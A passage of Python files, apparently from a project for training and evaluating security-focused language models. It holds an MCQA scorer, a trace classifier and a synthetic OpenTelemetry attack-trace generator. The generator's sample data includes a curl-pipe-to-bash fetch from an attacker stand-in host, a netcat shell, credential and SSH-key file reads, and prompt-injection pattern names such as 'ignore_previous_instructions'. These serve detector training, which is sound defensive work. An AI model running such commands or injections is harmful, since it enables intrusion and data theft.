|
| 46 |
+
<|start_header_id|>assistant<|end_header_id|>
|
| 47 |
+
|
| 48 |
+
"""
|
| 49 |
+
|
| 50 |
+
inputs = tokenizer(full_prompt, return_tensors="pt").to(device)
|
| 51 |
+
|
| 52 |
+
with torch.no_grad():
|
| 53 |
+
outputs = model.generate(
|
| 54 |
+
**inputs,
|
| 55 |
+
max_new_tokens=5,
|
| 56 |
+
temperature=0.1,
|
| 57 |
+
do_sample=False,
|
| 58 |
+
pad_token_id=tokenizer.eos_token_id
|
| 59 |
+
)
|
| 60 |
+
|
| 61 |
+
response = tokenizer.decode(outputs[0][inputs['input_ids'].shape[1]:], skip_special_tokens=True)
|
| 62 |
+
response = response.strip()
|
| 63 |
+
|
| 64 |
+
# Extract answer letter (A, B, C, or D)
|
| 65 |
+
response_upper = response.upper()
|
| 66 |
+
for letter in ['A', 'B', 'C', 'D']:
|
| 67 |
+
if letter in response_upper[:10]: # Check first 10 chars
|
| 68 |
+
return ord(letter) - ord('A') # Convert to 0-3 index
|
| 69 |
+
|
| 70 |
+
# If no clear answer, return -1
|
| 71 |
+
return -1
|
| 72 |
+
|
| 73 |
+
def evaluate_model(model_name, questions_file, output_file):
|
| 74 |
+
"""Evaluate model on all questions and save results."""
|
| 75 |
+
print(f"Loading model: {model_name}")
|
| 76 |
+
device = "cuda" if torch.cuda.is_available() else "cpu"
|
| 77 |
+
|
| 78 |
+
tokenizer = AutoTokenizer.from_pretrained(model_name)
|
| 79 |
+
model = AutoModelForCausalLM.from_pretrained(
|
| 80 |
+
model_name,
|
| 81 |
+
torch_dtype=torch.bfloat16,
|
| 82 |
+
device_map="auto"
|
| 83 |
+
)
|
| 84 |
+
model.eval()
|
| 85 |
+
|
| 86 |
+
print(f"Loading questions from: {questions_file}")
|
| 87 |
+
questions = load_questions(questions_file)
|
| 88 |
+
print(f"Total questions: {len(questions)}")
|
| 89 |
+
|
| 90 |
+
# Track results
|
| 91 |
+
results = {
|
| 92 |
+
'model': model_name,
|
| 93 |
+
'timestamp': datetime.now().isoformat(),
|
| 94 |
+
'total_questions': len(questions),
|
| 95 |
+
'detailed_results': [],
|
| 96 |
+
'category_breakdown': {}
|
| 97 |
+
}
|
| 98 |
+
|
| 99 |
+
correct_total = 0
|
| 100 |
+
correct_agentic = 0
|
| 101 |
+
total_agentic = 0
|
| 102 |
+
correct_traditional = 0
|
| 103 |
+
total_traditional = 0
|
| 104 |
+
|
| 105 |
+
print("\nEvaluating...")
|
| 106 |
+
for i, q in enumerate(tqdm(questions)):
|
| 107 |
+
prompt = format_prompt(q)
|
| 108 |
+
predicted = get_model_answer(model, tokenizer, prompt, device)
|
| 109 |
+
correct_answer = q['answer']
|
| 110 |
+
is_correct = (predicted == correct_answer)
|
| 111 |
+
|
| 112 |
+
category = q.get('category', 'unknown')
|
| 113 |
+
is_agentic = category == 'agentic_security'
|
| 114 |
+
|
| 115 |
+
if is_correct:
|
| 116 |
+
correct_total += 1
|
| 117 |
+
if is_agentic:
|
| 118 |
+
correct_agentic += 1
|
| 119 |
+
else:
|
| 120 |
+
correct_traditional += 1
|
| 121 |
+
|
| 122 |
+
if is_agentic:
|
| 123 |
+
total_agentic += 1
|
| 124 |
+
else:
|
| 125 |
+
total_traditional += 1
|
| 126 |
+
|
| 127 |
+
# Track by category
|
| 128 |
+
if category not in results['category_breakdown']:
|
| 129 |
+
results['category_breakdown'][category] = {'correct': 0, 'total': 0}
|
| 130 |
+
results['category_breakdown'][category]['total'] += 1
|
| 131 |
+
if is_correct:
|
| 132 |
+
results['category_breakdown'][category]['correct'] += 1
|
| 133 |
+
|
| 134 |
+
results['detailed_results'].append({
|
| 135 |
+
'question_id': i,
|
| 136 |
+
'category': category,
|
| 137 |
+
'is_agentic': is_agentic,
|
| 138 |
+
'predicted': predicted,
|
| 139 |
+
'correct_answer': correct_answer,
|
| 140 |
+
'is_correct': is_correct,
|
| 141 |
+
'question': q['question'][:100] + '...' if len(q['question']) > 100 else q['question']
|
| 142 |
+
})
|
| 143 |
+
|
| 144 |
+
# Calculate final metrics
|
| 145 |
+
results['metrics'] = {
|
| 146 |
+
'overall_accuracy': correct_total / len(questions),
|
| 147 |
+
'overall_correct': correct_total,
|
| 148 |
+
'overall_total': len(questions),
|
| 149 |
+
'agentic_accuracy': correct_agentic / total_agentic if total_agentic > 0 else 0,
|
| 150 |
+
'agentic_correct': correct_agentic,
|
| 151 |
+
'agentic_total': total_agentic,
|
| 152 |
+
'traditional_accuracy': correct_traditional / total_traditional if total_traditional > 0 else 0,
|
| 153 |
+
'traditional_correct': correct_traditional,
|
| 154 |
+
'traditional_total': total_traditional
|
| 155 |
+
}
|
| 156 |
+
|
| 157 |
+
# Save results
|
| 158 |
+
print(f"\nSaving results to: {output_file}")
|
| 159 |
+
with open(output_file, 'w') as f:
|
| 160 |
+
json.dump(results, f, indent=2)
|
| 161 |
+
|
| 162 |
+
# Print summary
|
| 163 |
+
print("\n" + "="*60)
|
| 164 |
+
print("EVALUATION RESULTS")
|
| 165 |
+
print("="*60)
|
| 166 |
+
print(f"Model: {model_name}")
|
| 167 |
+
print(f"Overall Accuracy: {results['metrics']['overall_accuracy']*100:.2f}% ({correct_total}/{len(questions)})")
|
| 168 |
+
print(f"Agentic Questions: {results['metrics']['agentic_accuracy']*100:.2f}% ({correct_agentic}/{total_agentic})")
|
| 169 |
+
print(f"Traditional Questions: {results['metrics']['traditional_accuracy']*100:.2f}% ({correct_traditional}/{total_traditional})")
|
| 170 |
+
print("\nCategory Breakdown:")
|
| 171 |
+
for cat, stats in sorted(results['category_breakdown'].items()):
|
| 172 |
+
acc = stats['correct'] / stats['total'] * 100
|
| 173 |
+
print(f" {cat}: {acc:.1f}% ({stats['correct']}/{stats['total']})")
|
| 174 |
+
print("="*60)
|
| 175 |
+
|
| 176 |
+
return results
|
| 177 |
+
|
| 178 |
+
if __name__ == "__main__":
|
| 179 |
+
parser = argparse.ArgumentParser(description='Evaluate base model on custom MCQA')
|
| 180 |
+
parser.add_argument('--model', type=str,
|
| 181 |
+
default='fdtn-ai/Foundation-Sec-8B-Instruct',
|
| 182 |
+
help='HuggingFace model name')
|
| 183 |
+
parser.add_argument('--questions', type=str,
|
| 184 |
+
default='cybersecurity_questions.jsonl',
|
| 185 |
+
help='Path to questions file')
|
| 186 |
+
parser.add_argument('--output', type=str,
|
| 187 |
+
default='base_model_evaluation_results.json',
|
| 188 |
+
help='Output JSON file for results')
|
| 189 |
+
|
| 190 |
+
args = parser.parse_args()
|
| 191 |
+
|
| 192 |
+
print(f"Foundation-Sec-8B Base Model Evaluation")
|
| 193 |
+
print(f"=========================================\n")
|
| 194 |
+
|
| 195 |
+
results = evaluate_model(args.model, args.questions, args.output)
|
evaluate_traces.py
ADDED
|
@@ -0,0 +1,60 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/usr/bin/env python3
|
| 2 |
+
"""Trace security classification evaluation."""
|
| 3 |
+
|
| 4 |
+
import json
|
| 5 |
+
import argparse
|
| 6 |
+
from transformers import AutoModelForCausalLM, AutoTokenizer
|
| 7 |
+
import torch
|
| 8 |
+
|
| 9 |
+
def evaluate_traces(model_name, benign_file, malicious_file):
|
| 10 |
+
"""Classify traces as benign or malicious."""
|
| 11 |
+
|
| 12 |
+
# Load model
|
| 13 |
+
print(f"Loading model: {model_name}")
|
| 14 |
+
tokenizer = AutoTokenizer.from_pretrained(model_name)
|
| 15 |
+
model = AutoModelForCausalLM.from_pretrained(
|
| 16 |
+
model_name,
|
| 17 |
+
torch_dtype=torch.float16,
|
| 18 |
+
device_map="auto"
|
| 19 |
+
)
|
| 20 |
+
|
| 21 |
+
# Load traces
|
| 22 |
+
with open(benign_file) as f:
|
| 23 |
+
benign_traces = json.load(f)
|
| 24 |
+
with open(malicious_file) as f:
|
| 25 |
+
malicious_traces = json.load(f)
|
| 26 |
+
|
| 27 |
+
def classify_trace(trace):
|
| 28 |
+
prompt = f"Analyze this OpenTelemetry trace for security threats. Is it benign or malicious?\n\nTrace: {json.dumps(trace)}\n\nClassification:"
|
| 29 |
+
|
| 30 |
+
inputs = tokenizer(prompt, return_tensors="pt", truncation=True, max_length=2048).to(model.device)
|
| 31 |
+
outputs = model.generate(**inputs, max_new_tokens=50)
|
| 32 |
+
response = tokenizer.decode(outputs[0], skip_special_tokens=True).lower()
|
| 33 |
+
|
| 34 |
+
return "malicious" in response
|
| 35 |
+
|
| 36 |
+
# Evaluate
|
| 37 |
+
tp = sum(1 for t in malicious_traces if classify_trace(t)) # True positives
|
| 38 |
+
tn = sum(1 for t in benign_traces if not classify_trace(t)) # True negatives
|
| 39 |
+
fp = len(benign_traces) - tn # False positives
|
| 40 |
+
fn = len(malicious_traces) - tp # False negatives
|
| 41 |
+
|
| 42 |
+
accuracy = 100.0 * (tp + tn) / (len(benign_traces) + len(malicious_traces))
|
| 43 |
+
fpr = 100.0 * fp / len(benign_traces) if len(benign_traces) > 0 else 0
|
| 44 |
+
|
| 45 |
+
print(f"\nResults:")
|
| 46 |
+
print(f" Accuracy: {accuracy:.1f}%")
|
| 47 |
+
print(f" True Positives: {tp}/{len(malicious_traces)}")
|
| 48 |
+
print(f" True Negatives: {tn}/{len(benign_traces)}")
|
| 49 |
+
print(f" False Positive Rate: {fpr:.1f}%")
|
| 50 |
+
|
| 51 |
+
return accuracy
|
| 52 |
+
|
| 53 |
+
if __name__ == "__main__":
|
| 54 |
+
parser = argparse.ArgumentParser()
|
| 55 |
+
parser.add_argument("--model", required=True, help="Model name or path")
|
| 56 |
+
parser.add_argument("--benign", default="datasets/benign_traces.json")
|
| 57 |
+
parser.add_argument("--malicious", default="datasets/malicious_traces.json")
|
| 58 |
+
args = parser.parse_args()
|
| 59 |
+
|
| 60 |
+
evaluate_traces(args.model, args.benign, args.malicious)
|
generate_synthetic.py
ADDED
|
@@ -0,0 +1,532 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/usr/bin/env python3
|
| 2 |
+
"""
|
| 3 |
+
Generate Synthetic OpenTelemetry Workflow Traces for Agentic Security Training
|
| 4 |
+
|
| 5 |
+
This script creates synthetic OTEL traces similar in structure to NVIDIA Nemotron
|
| 6 |
+
Safety/Security datasets but independently generated. Each trace includes:
|
| 7 |
+
- Realistic span hierarchies with parent-child relationships
|
| 8 |
+
- Tool invocations (file, network, database, API calls)
|
| 9 |
+
- Attack patterns (exfiltration, injection, privilege escalation)
|
| 10 |
+
- Security indicators and defense mechanisms
|
| 11 |
+
|
| 12 |
+
Output: JSONL files with instruction-response pairs for model training
|
| 13 |
+
"""
|
| 14 |
+
|
| 15 |
+
import json
|
| 16 |
+
import random
|
| 17 |
+
import uuid
|
| 18 |
+
from datetime import datetime, timedelta
|
| 19 |
+
from pathlib import Path
|
| 20 |
+
from typing import List, Dict, Any
|
| 21 |
+
|
| 22 |
+
# Attack categories and patterns
|
| 23 |
+
ATTACK_CATEGORIES = {
|
| 24 |
+
"tool_exfiltration": {
|
| 25 |
+
"description": "Unauthorized data extraction via tool invocations",
|
| 26 |
+
"severity": "critical",
|
| 27 |
+
"patterns": [
|
| 28 |
+
"database_query_and_upload",
|
| 29 |
+
"file_read_and_network_send",
|
| 30 |
+
"api_scraping_and_storage",
|
| 31 |
+
"credential_theft_and_transmission"
|
| 32 |
+
]
|
| 33 |
+
},
|
| 34 |
+
"prompt_injection": {
|
| 35 |
+
"description": "Malicious prompt manipulation to bypass safety controls",
|
| 36 |
+
"severity": "high",
|
| 37 |
+
"patterns": [
|
| 38 |
+
"ignore_previous_instructions",
|
| 39 |
+
"role_confusion_attack",
|
| 40 |
+
"delimiter_injection",
|
| 41 |
+
"context_smuggling"
|
| 42 |
+
]
|
| 43 |
+
},
|
| 44 |
+
"privilege_escalation": {
|
| 45 |
+
"description": "Gradual elevation of access permissions",
|
| 46 |
+
"severity": "critical",
|
| 47 |
+
"patterns": [
|
| 48 |
+
"sudo_request_chain",
|
| 49 |
+
"role_assumption_attack",
|
| 50 |
+
"permission_boundary_bypass",
|
| 51 |
+
"administrative_api_abuse"
|
| 52 |
+
]
|
| 53 |
+
},
|
| 54 |
+
"policy_violation": {
|
| 55 |
+
"description": "Regulatory compliance breaches across workflows",
|
| 56 |
+
"severity": "high",
|
| 57 |
+
"patterns": [
|
| 58 |
+
"gdpr_consent_bypass",
|
| 59 |
+
"hipaa_phi_exposure",
|
| 60 |
+
"pci_dss_card_data_leak",
|
| 61 |
+
"soc2_audit_trail_deletion"
|
| 62 |
+
]
|
| 63 |
+
},
|
| 64 |
+
"stealth_attack": {
|
| 65 |
+
"description": "Time-delayed or obfuscated attack sequences",
|
| 66 |
+
"severity": "high",
|
| 67 |
+
"patterns": [
|
| 68 |
+
"time_delayed_activation",
|
| 69 |
+
"gradual_data_aggregation",
|
| 70 |
+
"semantic_obfuscation",
|
| 71 |
+
"low_and_slow_exfiltration"
|
| 72 |
+
]
|
| 73 |
+
},
|
| 74 |
+
"multi_agent_coordination": {
|
| 75 |
+
"description": "Distributed attack across multiple agents",
|
| 76 |
+
"severity": "critical",
|
| 77 |
+
"patterns": [
|
| 78 |
+
"reconnaissance_and_exploitation",
|
| 79 |
+
"data_gathering_and_exfiltration",
|
| 80 |
+
"privilege_escalation_and_lateral_movement",
|
| 81 |
+
"command_and_control_coordination"
|
| 82 |
+
]
|
| 83 |
+
}
|
| 84 |
+
}
|
| 85 |
+
|
| 86 |
+
TOOL_TYPES = {
|
| 87 |
+
"file_system": ["read_file", "write_file", "list_directory", "delete_file", "create_directory"],
|
| 88 |
+
"network": ["http_request", "download_file", "upload_file", "dns_lookup", "tcp_connect"],
|
| 89 |
+
"database": ["query", "insert", "update", "delete", "create_table"],
|
| 90 |
+
"api": ["rest_call", "graphql_query", "webhook_trigger", "oauth_request"],
|
| 91 |
+
"system": ["execute_command", "create_process", "modify_registry", "install_package"],
|
| 92 |
+
"auth": ["login", "authenticate", "get_token", "refresh_credentials", "assume_role"]
|
| 93 |
+
}
|
| 94 |
+
|
| 95 |
+
DEFENSE_MECHANISMS = [
|
| 96 |
+
"rate_limiting",
|
| 97 |
+
"input_validation",
|
| 98 |
+
"output_filtering",
|
| 99 |
+
"permission_check",
|
| 100 |
+
"anomaly_detection",
|
| 101 |
+
"content_scanning",
|
| 102 |
+
"sandboxing",
|
| 103 |
+
"audit_logging"
|
| 104 |
+
]
|
| 105 |
+
|
| 106 |
+
|
| 107 |
+
def generate_trace_id() -> str:
|
| 108 |
+
"""Generate realistic OpenTelemetry trace ID"""
|
| 109 |
+
return uuid.uuid4().hex[:32]
|
| 110 |
+
|
| 111 |
+
|
| 112 |
+
def generate_span_id() -> str:
|
| 113 |
+
"""Generate realistic OpenTelemetry span ID"""
|
| 114 |
+
return uuid.uuid4().hex[:16]
|
| 115 |
+
|
| 116 |
+
|
| 117 |
+
def generate_timestamp(base_time: datetime, offset_seconds: float) -> str:
|
| 118 |
+
"""Generate ISO timestamp with offset"""
|
| 119 |
+
return (base_time + timedelta(seconds=offset_seconds)).isoformat() + 'Z'
|
| 120 |
+
|
| 121 |
+
|
| 122 |
+
def generate_tool_invocation(tool_category: str, tool_name: str,
|
| 123 |
+
timestamp: str, attack_context: Dict[str, Any]) -> Dict[str, Any]:
|
| 124 |
+
"""Generate realistic tool invocation with parameters"""
|
| 125 |
+
invocations = {
|
| 126 |
+
"file_system": {
|
| 127 |
+
"read_file": {
|
| 128 |
+
"path": random.choice([
|
| 129 |
+
"/home/user/documents/sensitive_data.pdf",
|
| 130 |
+
"/var/log/system/credentials.txt",
|
| 131 |
+
"/etc/passwd",
|
| 132 |
+
"/home/user/.ssh/id_rsa",
|
| 133 |
+
"/opt/app/config/database.yml"
|
| 134 |
+
]),
|
| 135 |
+
"bytes_read": random.randint(1024, 10485760)
|
| 136 |
+
},
|
| 137 |
+
"list_directory": {
|
| 138 |
+
"path": random.choice(["/home/user/documents", "/var/www/html", "/tmp", "/opt/secrets"]),
|
| 139 |
+
"file_count": random.randint(10, 500)
|
| 140 |
+
}
|
| 141 |
+
},
|
| 142 |
+
"network": {
|
| 143 |
+
"upload_file": {
|
| 144 |
+
"url": random.choice([
|
| 145 |
+
"https://attacker-controlled.com/upload",
|
| 146 |
+
"https://suspicious-domain.xyz/api/data",
|
| 147 |
+
"http://192.168.1.100:8080/receive",
|
| 148 |
+
"https://pastebin.com/api/create"
|
| 149 |
+
]),
|
| 150 |
+
"size_bytes": random.randint(1024, 52428800),
|
| 151 |
+
"protocol": "https"
|
| 152 |
+
},
|
| 153 |
+
"http_request": {
|
| 154 |
+
"url": random.choice([
|
| 155 |
+
"https://api.internal.corp/users/export",
|
| 156 |
+
"https://database.company.com/query",
|
| 157 |
+
"https://admin.service.com/secrets"
|
| 158 |
+
]),
|
| 159 |
+
"method": random.choice(["GET", "POST", "PUT"]),
|
| 160 |
+
"status_code": random.choice([200, 201, 403, 500])
|
| 161 |
+
}
|
| 162 |
+
},
|
| 163 |
+
"database": {
|
| 164 |
+
"query": {
|
| 165 |
+
"statement": random.choice([
|
| 166 |
+
"SELECT * FROM users WHERE role='admin'",
|
| 167 |
+
"SELECT credit_card_number, cvv FROM payments",
|
| 168 |
+
"SELECT password_hash FROM credentials",
|
| 169 |
+
"SELECT ssn, dob FROM patient_records"
|
| 170 |
+
]),
|
| 171 |
+
"rows_returned": random.randint(100, 50000),
|
| 172 |
+
"execution_time_ms": random.randint(50, 5000)
|
| 173 |
+
}
|
| 174 |
+
},
|
| 175 |
+
"system": {
|
| 176 |
+
"execute_command": {
|
| 177 |
+
"command": random.choice([
|
| 178 |
+
"sudo -i",
|
| 179 |
+
"curl https://attacker.com/shell.sh | bash",
|
| 180 |
+
"chmod +x /tmp/backdoor",
|
| 181 |
+
"nc -lvp 4444 -e /bin/bash"
|
| 182 |
+
]),
|
| 183 |
+
"exit_code": random.choice([0, 1, 127])
|
| 184 |
+
}
|
| 185 |
+
},
|
| 186 |
+
"auth": {
|
| 187 |
+
"assume_role": {
|
| 188 |
+
"target_role": random.choice(["admin", "root", "superuser", "system"]),
|
| 189 |
+
"current_role": random.choice(["guest", "user", "read_only"]),
|
| 190 |
+
"success": attack_context.get("defense_active", False) is False
|
| 191 |
+
}
|
| 192 |
+
}
|
| 193 |
+
}
|
| 194 |
+
|
| 195 |
+
base_invocation = invocations.get(tool_category, {}).get(tool_name, {})
|
| 196 |
+
|
| 197 |
+
return {
|
| 198 |
+
"tool_name": f"{tool_category}.{tool_name}",
|
| 199 |
+
"timestamp": timestamp,
|
| 200 |
+
"parameters": base_invocation,
|
| 201 |
+
"duration_ms": random.randint(10, 5000)
|
| 202 |
+
}
|
| 203 |
+
|
| 204 |
+
|
| 205 |
+
def generate_attack_trace(category: str, pattern: str, with_defense: bool = False) -> Dict[str, Any]:
|
| 206 |
+
"""Generate complete OTEL trace with attack pattern"""
|
| 207 |
+
trace_id = generate_trace_id()
|
| 208 |
+
base_time = datetime.now()
|
| 209 |
+
|
| 210 |
+
# Generate workflow spans
|
| 211 |
+
spans = []
|
| 212 |
+
tool_invocations = []
|
| 213 |
+
current_time_offset = 0
|
| 214 |
+
|
| 215 |
+
# Attack-specific span generation
|
| 216 |
+
if category == "tool_exfiltration":
|
| 217 |
+
# Step 1: Data gathering
|
| 218 |
+
span1_id = generate_span_id()
|
| 219 |
+
spans.append({
|
| 220 |
+
"span_id": span1_id,
|
| 221 |
+
"parent_span_id": None,
|
| 222 |
+
"name": "data_gathering",
|
| 223 |
+
"start_time": generate_timestamp(base_time, current_time_offset),
|
| 224 |
+
"end_time": generate_timestamp(base_time, current_time_offset + 2.5),
|
| 225 |
+
"attributes": {"phase": "reconnaissance", "risk_level": "medium"}
|
| 226 |
+
})
|
| 227 |
+
|
| 228 |
+
# Database query tool
|
| 229 |
+
tool_invocations.append(generate_tool_invocation(
|
| 230 |
+
"database", "query",
|
| 231 |
+
generate_timestamp(base_time, current_time_offset + 0.5),
|
| 232 |
+
{"defense_active": with_defense}
|
| 233 |
+
))
|
| 234 |
+
current_time_offset += 3
|
| 235 |
+
|
| 236 |
+
# Step 2: Exfiltration attempt
|
| 237 |
+
span2_id = generate_span_id()
|
| 238 |
+
spans.append({
|
| 239 |
+
"span_id": span2_id,
|
| 240 |
+
"parent_span_id": span1_id,
|
| 241 |
+
"name": "data_exfiltration",
|
| 242 |
+
"start_time": generate_timestamp(base_time, current_time_offset),
|
| 243 |
+
"end_time": generate_timestamp(base_time, current_time_offset + 5.0),
|
| 244 |
+
"attributes": {"phase": "exfiltration", "risk_level": "critical"}
|
| 245 |
+
})
|
| 246 |
+
|
| 247 |
+
# Upload to external server
|
| 248 |
+
tool_invocations.append(generate_tool_invocation(
|
| 249 |
+
"network", "upload_file",
|
| 250 |
+
generate_timestamp(base_time, current_time_offset + 1.0),
|
| 251 |
+
{"defense_active": with_defense}
|
| 252 |
+
))
|
| 253 |
+
|
| 254 |
+
elif category == "privilege_escalation":
|
| 255 |
+
# Gradual elevation sequence
|
| 256 |
+
roles = ["guest", "user", "power_user", "admin"]
|
| 257 |
+
for i, role in enumerate(roles[:-1]):
|
| 258 |
+
span_id = generate_span_id()
|
| 259 |
+
parent_id = spans[-1]["span_id"] if spans else None
|
| 260 |
+
|
| 261 |
+
spans.append({
|
| 262 |
+
"span_id": span_id,
|
| 263 |
+
"parent_span_id": parent_id,
|
| 264 |
+
"name": f"request_elevation_to_{roles[i+1]}",
|
| 265 |
+
"start_time": generate_timestamp(base_time, current_time_offset),
|
| 266 |
+
"end_time": generate_timestamp(base_time, current_time_offset + 1.5),
|
| 267 |
+
"attributes": {"current_role": role, "target_role": roles[i+1], "risk_level": "high"}
|
| 268 |
+
})
|
| 269 |
+
|
| 270 |
+
tool_invocations.append(generate_tool_invocation(
|
| 271 |
+
"auth", "assume_role",
|
| 272 |
+
generate_timestamp(base_time, current_time_offset + 0.5),
|
| 273 |
+
{"defense_active": with_defense}
|
| 274 |
+
))
|
| 275 |
+
|
| 276 |
+
current_time_offset += random.uniform(2.0, 5.0)
|
| 277 |
+
|
| 278 |
+
elif category == "multi_agent_coordination":
|
| 279 |
+
# Multiple agents coordinating
|
| 280 |
+
agents = ["agent_A", "agent_B", "agent_C"]
|
| 281 |
+
for agent_name in agents:
|
| 282 |
+
span_id = generate_span_id()
|
| 283 |
+
parent_id = spans[-1]["span_id"] if spans else None
|
| 284 |
+
|
| 285 |
+
spans.append({
|
| 286 |
+
"span_id": span_id,
|
| 287 |
+
"parent_span_id": parent_id,
|
| 288 |
+
"name": f"{agent_name}_action",
|
| 289 |
+
"start_time": generate_timestamp(base_time, current_time_offset),
|
| 290 |
+
"end_time": generate_timestamp(base_time, current_time_offset + 2.0),
|
| 291 |
+
